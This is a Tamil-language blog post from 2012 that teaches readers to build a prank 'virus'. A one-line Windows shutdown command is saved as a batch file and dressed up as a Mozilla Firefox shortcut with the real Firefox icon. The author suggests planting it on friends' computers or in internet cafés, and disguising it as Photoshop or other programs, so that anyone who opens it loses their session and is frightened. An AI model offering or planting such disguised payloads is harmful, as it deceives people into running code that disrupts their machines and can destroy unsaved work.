728x90 AdSpace

  • Latest News

    Tuesday, August 14, 2012

    Mozilla firefox காண virus

                                                     பிஸ்மில்லாகி ரஹ்மானிர்ரஹீம் 
                        புகழ் அனைத்தும் இறைவனுக்கே   அல்ஹம்துலிலாஹ் 
                                இது எனது 100வது பதிவு THIS IS MY 100 POST

     சரி நாம்  பதிவுக்கு வருவோம் அதாவது Mozilla firefox காண  virus ஆகும் .
    நாம்  சென்ற பதிவில் facebook virus. 



    பார்த்தோம் இந்த   பதிவும் அதே போல் Mozilla firefox காண  virus ஆகும் .பதிவுக்கு செல்வோம் .ஒரு Notepad இல் எத்தனையோ வேலை செய்யலாம் .சாதாரண program தொட்டு பாரிய program வரை செய்யலாம்.அந்த வரிசையில் நாம் உருவாகும் வைரஸுக்கும் ஒரு  Notepad இல் தான் .

    setup1
          

    shutdown -s -t 35 -c "You Mozilla Firefox Program Is Open Problam Than shutdown You Computer "
    இந்த codeஐ  ஒரு  Notepad இல் எழுதி கொள்ளவும் 
    (copy and past செய்ய முடியாத படியால் codeஐ  தரவிறக்க )


    தரவிறக்கிய code ஐ  மேலே படத்தில் உள்ளது போல type செய்து கொள்ளவும் .பிறகு அதை  Mozilla firefox.bat  என்ற பெயர் கொடுத்து சேமித்து கொள்ளவும்.
     
     setup2
    உங்கள் Desktop இல் தெரியும் இந்த   icon இல் rigth click செய்து  create shortcut என்பதை கொடுக்கவும் .

    setup3

    அதற்கான படம்   இதில் rigth click செய்து properties யை தெரிவு செய்யவும்  வரும் window வில்   change icon .



    setup4
     
    வரும் window வில் Browseஎன்ற இடத்தில் Mozilla firefox கு ஏற்ற icon ஒன்றை தெரிவு செய்யவும் அதை C:\Program Files\Mozilla Firefox\firefox.exe இந்த   பைலுக்குள் இருந்து தெரிவு செய்யவும் பிறகு ok .ok .apply .

    setup5
    உங்கள் Desktop இல் இப்படி ஒரு படம் தெரியும்.  அதன் பெயரை Mozilla firefox என மாற்றவும்  அவ்வளவுதான் இப்போது உங்கள் Desktop இல் தெரியும் Mozilla firefox icon ஐ open பண்ணவும் .  இப்படியான ஒரு செய்தியுடன் உங்கள் கணினி 35 செக்கன்களில் அணைந்து விடும்.

        பதிவு பற்றி சில :-
    1.    இதை  உங்கள் வீட்டிலோ அல்லது இன்டர்னட் கடைகளிலோ அல்லது நண்பர்களின் கணணியிலோ செய்து வைக்கலாம் 
    2. உங்கள்  கணணி சீக்கிறமாக shutdown செய்வதற்கும் இதை பயன்படுத்தலாம் 
     இன்டர்னட் கடைகளில் செய்து வைக்கும் பொது யாராவது   வந்து  Mozilla firefox ஐ open செய்தால் கணணி shutdown ஆகி விடும் அதனால் வந்தவர் நம்மால் ஏதோ ஆகி விட்டது என்று பயந்து போவர்

    குறிப்பு :இதை  Mozilla firefox மட்டுமின்றி google ,adobe photo shop மற்றும் ஏனைய முக்கிய softwear களுக்கு பயன்படுத்தலாம் .அப்படி மாற்றம் செய்வதாயின்
    shutdown -s -t 35 -c "You Mozilla Firefox Program Is Open Problam Than shutdown You Computer "       இந்த code இல் You Mozilla Firefox Program Is Open Problam Than shutdown You Computer   இந்த  code க்கு பதிலாக நீங்கள் விரும்பியதை  கொடுத்து கொள்ளவும் .
                                       
                                                            ILSHAN 

                                                  
                                                            ILSHAN 


    • Blogger Comments
    • Facebook Comments

    0 $type={blogger}:

    Post a Comment

    Item Reviewed: Mozilla firefox காண virus Rating: 5 Reviewed By: The life
    Scroll to Top